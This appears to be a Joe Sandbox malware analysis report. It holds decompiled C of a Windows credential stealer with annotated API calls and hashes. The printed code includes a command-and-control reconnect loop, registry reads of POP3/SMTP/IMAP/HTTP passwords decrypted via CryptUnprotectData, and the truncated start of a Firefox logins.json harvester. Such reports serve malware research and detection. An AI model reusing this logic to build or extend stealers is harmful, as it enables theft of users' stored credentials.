                                      • Opcode ID: 723127028c0824c374a1bfe5684c98f4400ca9c0bdf9e3867ca83610754a06e3
                                      • Instruction ID: 1b04be9060418ec1721f71337fb3319d6fbfdec9b03131f00dbffc4cb877f694
                                      • Opcode Fuzzy Hash: 723127028c0824c374a1bfe5684c98f4400ca9c0bdf9e3867ca83610754a06e3
                                      • Instruction Fuzzy Hash: 57B012303E424157DA001B708C06F143710A743B07F2006B0B112C80F4C6D100815505
                                      Uniqueness

                                      Uniqueness Score: 5.06%

                                      C-Code - Quality: 100%
			// Command-and-control loop. Object fields: +0x23c keep-running flag, +0x1e4 connection
			// configuration, +0x210 delay in ms between attempts, +4 the connection object. Each pass
			// pulls two entries from the configuration (E004357F5), converts one to a multibyte
			// string (E00433381 wraps WideCharToMultiByte; getaddrinfo takes narrow host names), tries
			// a TCP connection in E0043538F (getaddrinfo, socket(AF_INET, SOCK_STREAM), htons,
			// connect), releases both temporary buffers (E00435A2D wraps VirtualFree) and, if the
			// connection succeeded, runs the command handler E004351E4. That handler sets a receive
			// timeout (setsockopt level 0xFFFF = SOL_SOCKET, option 0x1006 = SO_RCVTIMEO), receives a
			// 12-byte header and then the rest of the message. The loop sleeps and repeats for as long
			// as the flag at +0x23c stays set.
			E00434A83(void* __ecx, void* __edx, void* __eflags) {
				signed int _v12;
				signed int _v20;
				void* _t18;
				short** _t20;
				void* _t22;
				void* _t24;
				void* _t33;
				void* _t34;
				void* _t35;
				intOrPtr _t37;
				void* _t38;

				_t38 = __eflags;
				_t33 = __edx;
				_t34 = __ecx;
				 *((intOrPtr*)(__ecx + 0x23c)) = 1; // keep-running flag
				_t35 = __ecx + 0x1e4; // connection configuration
				do {
					_t26 = _t35;
					_t18 = E004357F5(_t35,  &_v20); // executed; first configuration entry
					_t20 = E004357F5(_t35,  &_v12); // executed; second configuration entry
					E00433381(_t20, _t37); // executed; wide to multibyte
					_t22 = E0043538F(_t34 + 4, _t38, _t26,  *((intOrPtr*)(_t18 + 4))); // executed; resolve and connect
					E00435A2D(_v12); // VirtualFree temporary buffer
					_v12 = _v12 & 0x00000000;
					_t24 = E00435A2D(_v20); // VirtualFree temporary buffer
					_v20 = _v20 & 0x00000000;
					_t39 = _t22;
					if(_t22 != 0) {
						_t24 = E004351E4(_t34 + 4, _t33, _t39, _t34); // connected: receive and dispatch commands
					}
					Sleep( *(_t34 + 0x210)); // reconnect / poll interval
					_t35 = _t34 + 0x1e4;
				} while ( *((intOrPtr*)(_t34 + 0x23c)) != 0);
				return _t24;
			}

			Instruction addresses for the listing above: 0x00434a83, 0x00434a83, 0x00434a8c, 0x00434a8e, 0x00434a98, 0x00434a9e, 0x00434aa1, 0x00434aa4, 0x00434ab4, 0x00434abb, 0x00434ac3, 0x00434acd, 0x00434ad5, 0x00434ad9, 0x00434ade, 0x00434ae2, 0x00434ae4, 0x00434aea, 0x00434aea, 0x00434af5, 0x00434b02, 0x00434b02, 0x00434b0e

                                      APIs
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00434AC0,?), ref: 004333AE
                                        • Part of subcall function 00433381: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00434AC0,?,?,?,?,?), ref: 004333D9
                                        • Part of subcall function 0043538F: getaddrinfo.WS2_32(?,00000000,00434AC8,00000000), ref: 004353DC
                                        • Part of subcall function 0043538F: socket.WS2_32(00000002,00000001,00000000), ref: 004353F3
                                        • Part of subcall function 0043538F: htons.WS2_32(?), ref: 00435419
                                        • Part of subcall function 0043538F: freeaddrinfo.WS2_32(00000000), ref: 00435429
                                        • Part of subcall function 0043538F: connect.WS2_32(?,?,00000010), ref: 00435435
                                        • Part of subcall function 00435A2D: VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      • Sleep.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00434AF5
                                        • Part of subcall function 004351E4: setsockopt.WS2_32(000000FF,0000FFFF,00001006,?,00000004), ref: 0043521B
                                        • Part of subcall function 004351E4: recv.WS2_32(000000FF,?,0000000C,00000000), ref: 0043526B
                                        • Part of subcall function 004351E4: recv.WS2_32(000000FF,?,000000FF,00000000), ref: 004352D7
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: ByteCharMultiWiderecv$FreeSleepVirtualconnectfreeaddrinfogetaddrinfohtonssetsockoptsocket
                                      • String ID:
                                      • API String ID: 3250391716-0
                                      • Opcode ID: 424d8b38d56f52fa032bcf73cf7a5636db3096304bb2df392324de75b174f696
                                      • Instruction ID: bc0c455e40c77411accbe2cd6a886333f8231335d0d9dce3d03aaeed77e79cf8
                                      • Opcode Fuzzy Hash: 424d8b38d56f52fa032bcf73cf7a5636db3096304bb2df392324de75b174f696
                                      • Instruction Fuzzy Hash: 8A019271A00515ABCB04FB66C84ABEEF779FF44359F01011AE41563141DB786A14CBD8
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
			// Allocates a fresh read/write buffer of __ecx bytes: VirtualAlloc(NULL, size,
			// MEM_COMMIT | MEM_RESERVE (0x3000), PAGE_READWRITE (4)). The buffer and its size are
			// then handed to E00435AB9, an initialisation routine that is not listed in this report.
			// E00435A3C further down performs the same allocation without that extra step.
			E004359AA(long __ecx) {
				void* _t1;
				long _t7;
				void* _t8;

				_t7 = __ecx;
				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				_t8 = _t1;
				E00435AB9(_t8, _t7); // post-allocation step on (buffer, size)
				return _t8;
			}

			Instruction addresses for the listing above: 0x004359b3, 0x004359b8, 0x004359be, 0x004359c3, 0x004359cd

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,0043320F,?,?,004355DF,.bss,00000000,?,?,00000000), ref: 004359B8
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: 99f1749da51cb424e49fcef07a8f2b6cfbd679283923d2cf63737f27756b9c84
                                      • Instruction ID: 1076667f22c0c216b28df5d2f29d8df219fa2eb3de0ede04fabfedabafe52af4
                                      • Opcode Fuzzy Hash: 99f1749da51cb424e49fcef07a8f2b6cfbd679283923d2cf63737f27756b9c84
                                      • Instruction Fuzzy Hash: F1C012223492202AE124225A7C1AF5B996CCBC2F71F01002FFB008A2D0D8D01C4241E8
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
			// Releases the buffer stored at object offset +0x10, if there is one, with
			// VirtualFree(base, 0, MEM_RELEASE (0x8000)); without a buffer it returns __eax unchanged.
			// The address list also contains 0x00435a35/0x00435a3b: the VirtualFree call attributed
			// to this function is the one at 0x00435A35 inside the E00435A2D wrapper, which the
			// decompiler folded into this listing.
			E00438C74(void* __eax, void* __ecx) {
				int _t3;
				void* _t5;

				_t5 =  *(__ecx + 0x10);
				if(_t5 != 0) {
					_t3 = VirtualFree(_t5, 0, 0x8000); // executed
					return _t3;
				} else {
					return __eax;
				}
			}

			Instruction addresses for the listing above: 0x00438c74, 0x00438c79, 0x00435a35, 0x00435a3b, 0x00438c7f, 0x00438c7f, 0x00438c7f

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: c0a687fc0ce93e3d17b72830b83dc365c5037e3d52d7af9103c6ae3d016df052
                                      • Instruction ID: 23793b1f467348edbb10cdd720d0e865ae2d3a4006315f596f2e8ad12e4bcb1a
                                      • Opcode Fuzzy Hash: c0a687fc0ce93e3d17b72830b83dc365c5037e3d52d7af9103c6ae3d016df052
                                      • Instruction Fuzzy Hash: 43B0927435070057EE2CDB209D5AF2A22107B80B05FA1569CB212DA1D19AA9E4029A08
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      C-Code - Quality: 100%
			// Thin allocator: VirtualAlloc(NULL, __ecx bytes, MEM_COMMIT | MEM_RESERVE (0x3000),
			// PAGE_READWRITE (4)). Used for the string buffers in the registry-path code path listed
			// in the APIs below.
			E00435A3C(long __ecx) {
				void* _t1;

				_t1 = VirtualAlloc(0, __ecx, 0x3000, 4); // executed
				return _t1;
			}

			Instruction addresses for the listing above: 0x00435a46, 0x00435a4c

                                      APIs
                                      • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,0043347F,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00435A46
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: AllocVirtual
                                      • String ID:
                                      • API String ID: 4275171209-0
                                      • Opcode ID: dcbeedaaa040acec354428e818f4b5d1b8506a3ec3496fc11baaae7e16b5646b
                                      • Instruction ID: 53aff4b3f69a05535d5509f380532bd93da84c80809f944211d28360f8aec016
                                      • Opcode Fuzzy Hash: dcbeedaaa040acec354428e818f4b5d1b8506a3ec3496fc11baaae7e16b5646b
                                      • Instruction Fuzzy Hash: FCA002B47E5300BAFD6957509E1FF157A189741F17F510154B705AC0D055E03581852D
                                      Uniqueness

                                      Uniqueness Score: 0.00%

                                      C-Code - Quality: 100%
			// Thin deallocator matching the VirtualAlloc wrappers above: VirtualFree(base, 0,
			// MEM_RELEASE (0x8000)) gives the whole reservation back.
			E00435A2D(void* __ecx) {
				int _t1;

				_t1 = VirtualFree(__ecx, 0, 0x8000); // executed
				return _t1;
			}

			Instruction addresses for the listing above: 0x00435a35, 0x00435a3b

                                      APIs
                                      • VirtualFree.KERNELBASE(00000000,00000000,00008000,0043E2AE,?,?,?,?,?,00000000), ref: 00435A35
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
• Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
• Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
• Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: FreeVirtual
                                      • String ID:
                                      • API String ID: 1263568516-0
                                      • Opcode ID: 40684cbbaa54f2643597d9000c708649fea3de3720d5000d000c35410c90259e
                                      • Instruction ID: 7a3b98a7f5e52f308c5a5c3db5597314b84a5ff7998d61d7e201427c0aa9c129
                                      • Opcode Fuzzy Hash: 40684cbbaa54f2643597d9000c708649fea3de3720d5000d000c35410c90259e
                                      • Instruction Fuzzy Hash: 8CA0027469070067ED7457205E0EF0626147741B01F6046947351A80E049E5A0448A1D
                                      Uniqueness

                                      Uniqueness Score: 0.02%

                                      Non-executed Functions

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: g_2660$g_2660$g_2660$g_2660$g_2660$g_2762$g_2762$g_2762$g_2762$g_2762$g_2863$g_2863$g_2863$g_2863$g_2863$g_3376$g_3376$g_3376$g_3376$g_3376$g_3433$g_3433$g_3433$g_3433$g_3433$g_3435$g_3435$g_3435$g_3435$g_3435$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f0$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f1$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f2$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f3$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3542.f4$g_3553$g_3553$g_3553$g_3553$g_3553
                                      • API String ID: 0-2865011727
                                      • Opcode ID: 1989d2e3ff336b230e8dcee5827cf910abb69da4b83b30888e100f2aa1a27ac5
                                      • Instruction ID: 2eb0dd8ef23874f4a6f5dfb507aadd863753cc852ceb9e82576648f662c73755
                                      • Opcode Fuzzy Hash: 1989d2e3ff336b230e8dcee5827cf910abb69da4b83b30888e100f2aa1a27ac5
                                      • Instruction Fuzzy Hash: 6BE16EFAA503417EFB0173699C03F3E316DD383B54F584948BA24AA3D3E5B6E9245278
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.578723047.00CC1000.00000020.00020000.sdmp, Offset: 00CC0000, based on PE: true
                                      • Associated: 00000003.00000002.578708562.00CC0000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578805483.00CE2000.00000002.00020000.sdmp
                                      • Associated: 00000003.00000002.578834966.00CEB000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578847102.00CEC000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578856272.00CED000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578871909.00CEF000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578928306.00D80000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578946601.00D81000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578962758.00D84000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.578971084.00D85000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.578988900.00D87000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579002903.00D89000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579026291.00D8D000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579044316.00D8E000.00000008.00020000.sdmp
                                      • Associated: 00000003.00000002.579062903.00D91000.00000004.00020000.sdmp
                                      • Associated: 00000003.00000002.579083023.00D93000.00000002.00020000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_cc0000_images.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 2o>H$2o>H$2o>H$2o>H$2o>H$B|_5$B|_5$B|_5$B|_5$B|_5$B|_5$Ku~$Ku~$Ku~$Ku~$Ku~$Ku~$Y$_6+*$ffUb$ffUb$i}J$i}J$i}J$qjf$qjf$qjf$qzv$vyvl$vyvl$vyvl$vyvl$wA,$wA,$wA,$x)1$x)1$x)1$x)1$x)1
                                      • API String ID: 0-3393124289
                                      • Opcode ID: 2a9409f720210f043a63ead169cffb4b68203e7b4eb8d126bf39d522b095b642
                                      • Instruction ID: 3be18c0e2f16ba75327398171e9e1e6221e4b3497e0bc7a6175eddaa9a75dbef
                                      • Opcode Fuzzy Hash: 2a9409f720210f043a63ead169cffb4b68203e7b4eb8d126bf39d522b095b642
                                      • Instruction Fuzzy Hash: 6C53D2B08057A98BDB70CF55CD887DDBBB1BB41328F2082D9D1696A391C7B61AC5CF81
                                      Uniqueness

                                      Uniqueness Score: 100.00%

                                      C-Code - Quality: 98%
                                      			E00438F40(void* __ecx, void* __edx, void* __eflags, void* _a4) {
                                      				// Decompiled routine: reads mail-account values (account name, e-mail address,
                                      				// POP3/SMTP servers, POP3 user) from the registry key handle in _a4 and, for the
                                      				// four "* Password" values, hands the stored blob to E004392D8, which per the APIs
                                      				// list below calls CryptUnprotectData (DPAPI) and falls back to the string
                                      				// "Could not decrypt". RegQueryValueExW on these value names combined with
                                      				// CryptUnprotectData is the credential-theft behaviour flagged in this report.
                                      				int _v8;
                                      				intOrPtr _v12;
                                      				char _v16;
                                      				char _v20;
                                      				char _v24;
                                      				char _v292;
                                      				char _v556;
                                      				char _v820;
                                      				char _v9012;
                                      				char _v17204;
                                      				long _t124;
                                      				long _t130;
                                      				long _t136;
                                      				long _t142;
                                      				void* _t180;
                                      				void* _t181;
                                      				void* _t199;
                                      				void* _t207;
                                      				void* _t208;
                                      				void* _t209;
                                      				void* _t210;
                                      				void* _t211;
                                      				void* _t212;
                                      				void* _t213;
                                      				void* _t214;
                                      				void* _t215;
                                      				void* _t216;
                                      				void* _t217;
                                      				long _t225; // status copies used below; missing from the raw decompiler output
                                      				long _t226;
                                      				long _t227;
                                      				long _t228;
                                      
                                      				_t199 = __edx;
                                      				_t181 = __ecx;
                                      				E00431130(0x4334, __ecx); // stack probe: 0x4334 == 17204 bytes of locals
                                      				_v8 = 0x1000; // lpcbData in/out size for RegQueryValueExW
                                      				_v24 = 0; // server string (POP3/SMTP Server)
                                      				_v20 = 0; // account string (Account Name, Email, POP3 User)
                                      				_t180 = _t181;
                                      				_v16 = 0; // decrypted password string
                                      				E00431052( &_v292, 0, 0x104); // memset-style zero fill (decompiler-named helper)
                                      				E00431052( &_v556, 0, 0x104);
                                      				E00431052( &_v820, 0, 0x104);
                                      				E00431052( &_v9012, 0, _v8);
                                      				_t207 = _a4; // HKEY of the account subkey
                                      				_t209 = _t208 + 0x30; // decompiler stack-pointer bookkeeping, no semantic effect
                                      				if(RegQueryValueExW(_t207, L"Account Name", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0043312C( &_v20, _t199,  &_v9012); // append the value to the account string
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t210 = _t209 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"Email", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0043312C( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t211 = _t210 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0043312C( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t212 = _t211 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"POP3 User", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0043312C( &_v20, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t213 = _t212 + 0xc;
                                      				if(RegQueryValueExW(_t207, L"SMTP Server", 0, 0,  &_v9012,  &_v8) == 0) {
                                      					E0043312C( &_v24, _t199,  &_v9012);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t214 = _t213 + 0xc;
                                      				// Password values: raw DPAPI blob in _v9012, decrypted output in _v17204.
                                      				_t124 = RegQueryValueExW(_t207, L"POP3 Password", 0, 0,  &_v9012,  &_v8);
                                      				_t225 = _t124;
                                      				if(_t124 == 0) {
                                      					E00431052( &_v17204, _t124, 0x1000);
                                      					E004392D8( &_v9012,  &_v17204, _t225, _v8); // GlobalAlloc + CryptUnprotectData
                                      					_t214 = _t214 + 0x10;
                                      					E0043312C( &_v16,  &_v17204,  &_v17204); // append the decrypted text
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t215 = _t214 + 0xc;
                                      				_t130 = RegQueryValueExW(_t207, L"SMTP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t226 = _t130;
                                      				if(_t130 == 0) {
                                      					E00431052( &_v17204, _t130, 0x1000);
                                      					E004392D8( &_v9012,  &_v17204, _t226, _v8);
                                      					_t215 = _t215 + 0x10;
                                      					E0043312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t216 = _t215 + 0xc;
                                      				_t136 = RegQueryValueExW(_t207, L"HTTP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t227 = _t136;
                                      				if(_t136 == 0) {
                                      					E00431052( &_v17204, _t136, 0x1000);
                                      					E004392D8( &_v9012,  &_v17204, _t227, _v8);
                                      					_t216 = _t216 + 0x10;
                                      					E0043312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v8 = 0x1000;
                                      				E00431052( &_v9012, 0, 0x1000);
                                      				_t217 = _t216 + 0xc;
                                      				_t142 = RegQueryValueExW(_t207, L"IMAP Password", 0, 0,  &_v9012,  &_v8);
                                      				_t228 = _t142;
                                      				if(_t142 == 0) {
                                      					E00431052( &_v17204, _t142, 0x1000);
                                      					E004392D8( &_v9012,  &_v17204, _t228, _v8);
                                      					_t217 = _t217 + 0x10;
                                      					E0043312C( &_v16,  &_v17204,  &_v17204);
                                      				}
                                      				_v12 = 3;
                                      				if(E0043308E( &_v24) > 0) { // lstrlenW-based check: was any server value found?
                                      					E00431EB9(_t217 - 0x10,  &_v24);
                                      					E00431EEF(_t180);
                                      				}
                                      				E0043138F( &_v24); // cleanup of the server string
                                      				return 1;
                                      			}


                                      APIs
                                      • RegQueryValueExW.ADVAPI32(?,Account Name,00000000,00000000,?,00001000,?,?,?,?,?,75F645DD,757992CF,00000000,?,00438F04), ref: 00438FC2
                                      • RegQueryValueExW.ADVAPI32(?,Email,00000000,00000000,?,00001000,?,?,?,?,?,?,?,?,75F645DD,757992CF), ref: 00439009
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Server,00000000,00000000,?,00001000), ref: 0043904D
                                      • RegQueryValueExW.ADVAPI32(?,POP3 User,00000000,00000000,?,00001000), ref: 00439091
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Server,00000000,00000000,?,00001000), ref: 004390D5
                                      • RegQueryValueExW.ADVAPI32(?,POP3 Password,00000000,00000000,?,00001000), ref: 00439119
                                      • RegQueryValueExW.ADVAPI32(?,SMTP Password,00000000,00000000,?,00001000), ref: 00439186
                                      • RegQueryValueExW.ADVAPI32(?,HTTP Password,00000000,00000000,?,00001000), ref: 004391F3
                                      • RegQueryValueExW.ADVAPI32(?,IMAP Password,00000000,00000000,?,00001000), ref: 00439260
                                        • Part of subcall function 004392D8: GlobalAlloc.KERNEL32(00000040,-00000001,75F645FD,?,?,?,0043928C,00001000,?,00000000,00001000), ref: 004392F6
                                        • Part of subcall function 004392D8: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,0043928C), ref: 0043932C
                                        • Part of subcall function 004392D8: lstrcpyW.KERNEL32(?,Could not decrypt), ref: 00439363
                                        • Part of subcall function 0043308E: lstrlenW.KERNEL32(?,00433473,?,?,?,0043F311,?,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,?,?,?,00000000), ref: 00433095
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.577692381.00431000.00000020.00000001.sdmp, Offset: 00430000, based on PE: true
                                      • Associated: 00000003.00000002.577686049.00430000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577710609.00442000.00000002.00000001.sdmp
                                      • Associated: 00000003.00000002.577718723.00446000.00000004.00000001.sdmp
                                      • Associated: 00000003.00000002.577725352.00448000.00000002.00000001.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_430000_images.jbxd
                                      Yara matches
                                      Similarity
                                      • API ID: QueryValue$AllocCryptDataGlobalUnprotectlstrcpylstrlen
                                      • String ID: Account Name$Email$HTTP Password$IMAP Password$POP3 Password$POP3 Server$POP3 User$SMTP Password$SMTP Server
                                      • API String ID: 6593746-2537589853
                                      • Opcode ID: 09eda6f71a2da7260302307d298def3de56931df9adf4367ad310fa3514513b9
                                      • Instruction ID: 340108873a9cc4f14c79cdb5aa310cc7283e2807fbc6629d46fe75d5bc771e07
                                      • Opcode Fuzzy Hash: 09eda6f71a2da7260302307d298def3de56931df9adf4367ad310fa3514513b9
                                      • Instruction Fuzzy Hash: 4BA121B291011DBADF25EAA1CD45FDF737CAF18744F1011AAF605F2184E6B8AB448F68
                                      Uniqueness

                                      Uniqueness Score: 10.55%

                                      C-Code - Quality: 95%
                                      			E004398B0(intOrPtr __ecx, void* __eflags, char _a4) {
                                      				int _v12;
                                      				int _v16;
                                      				WCHAR* _v20;
                                      				WCHAR* _v24;
                                      				char _v28;
                                      				intOrPtr _v32;
                                      				WCHAR* _v36;
                                      				char _v40;
                                      				char _v44;
                                      				int _v48;
                                      				int _v52;
                                      				int _v56;
                                      				char _v60;
                                      				char _v64;
                                      				char _v68;
                                      				char _v72;
                                      				char _v76;
                                      				char _v80;
                                      				char _v84;
                                      				char _v88;
                                      				long _v92;
                                      				int _v96;
                                      				intOrPtr _v100;
                                      				char _v104;
                                      				char _v108;
                                      				char _v112;
                                      				void* _v116;
                                      				int _v120;
                                      				char _v124;
                                      				char _v128;
                                      				char _v132;
                                      				char _v136;
                                      				char _v140;
                                      				char _v144;
                                      				char _v148;
                                      				char _v152;
                                      				int _v156;
                                      				char _v160;
                                      				intOrPtr _v164;
                                      				char _v180;
                                      				char _v184;
                                      				short _v704;
                                      				short _v1224;
                                      				char* _t165;
                                      				void* _t167;
                                      				int _t189;
                                      				int _t190;
                                      				int _t193;
                                      				int _t207;
                                      				WCHAR* _t215;
                                      				void* _t217;
                                      				int _t221;
                                      				void* _t230;
                                      				void* _t236;
                                      				void* _t242;
                                      				int _t281;
                                      				int _t283;
                                      				char* _t293;
                                      				char* _t325;
                                      				void* _t386;
                                      				long _t389;
                                      				intOrPtr _t391;
                                      				intOrPtr _t392;
                                      				WCHAR* _t393;
                                      				int _t394;
                                      				void* _t395;
                                      				void* _t396;
                                      				void* _t397;
                                      				void* _t385; // scratch pointers used below; missing from the raw decompiler output
                                      				void* _t390;
                                      				void* _t395;
                                      				long _t399;
                                      				void* _t400;
                                      
                                      				// Decompiled routine (output is cut off at the end of this listing): locates
                                      				// firefox.exe, checks whether it is a 64-bit image, then walks the [ProfileN]
                                      				// sections of %APPDATA%\Mozilla\Firefox\profiles.ini and copies each profile's
                                      				// logins.json to a temporary file. The three indirect calls through the object
                                      				// at _t392 (+0x68, +0x80, +0x7c) are not resolved on this page.
                                      				_t397 = __eflags;
                                      				_t392 = __ecx;
                                      				_v32 = __ecx;
                                      				E00433412( &_v24, L"Profile"); // section-name prefix for profiles.ini
                                      				_t281 = 0;
                                      				E00431052( &_v1224, 0, 0x208); // memset-style zero fill (decompiler-named helper)
                                      				_t396 = _t395 + 0xc; // decompiler stack-pointer bookkeeping, no semantic effect
                                      				_v92 = 0;
                                      				_t389 = 0; // profile index
                                      				E00431052( &_v704, 0, 0x104);
                                      				_t385 =  &_v704;
